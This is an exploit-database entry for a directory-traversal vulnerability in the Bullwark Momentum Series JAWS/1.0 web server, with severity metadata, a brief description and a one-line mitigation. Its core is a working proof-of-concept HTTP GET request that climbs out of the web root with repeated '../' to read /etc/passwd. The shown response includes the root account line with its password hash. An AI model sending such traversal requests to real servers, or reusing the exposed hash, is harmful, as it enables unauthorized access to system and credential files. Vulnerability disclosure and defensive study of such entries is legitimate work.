header-logo
Suggest Exploit
vendor:
Momentum Series Web Server
by:
Numan Türle
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Momentum Series Web Server
Affected Version From: Bullwark Momentum Series Web Server JAWS/1.0
Affected Version To: Bullwark Momentum Series Web Server JAWS/1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:bullwark:momentum_series_web_server:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

Bullwark Momentum Series JAWS 1.0 – Directory Traversal

A directory traversal vulnerability exists in Bullwark Momentum Series Web Server JAWS/1.0. An attacker can send a specially crafted HTTP request containing '../' sequences to read arbitrary files from the server.

Mitigation:

Ensure that user input is validated and filtered before being used in file system operations.
Source

Exploit-DB raw data:

# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
# Date: 2019-12-11
# Author: Numan Türle
# Vendor Homepage: http://www.bullwark.net/
# Version : Bullwark Momentum Series Web Server JAWS/1.0
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24

POC
---------

GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

root:ABgia2Z.lfFhA:0:0::/root:/bin/sh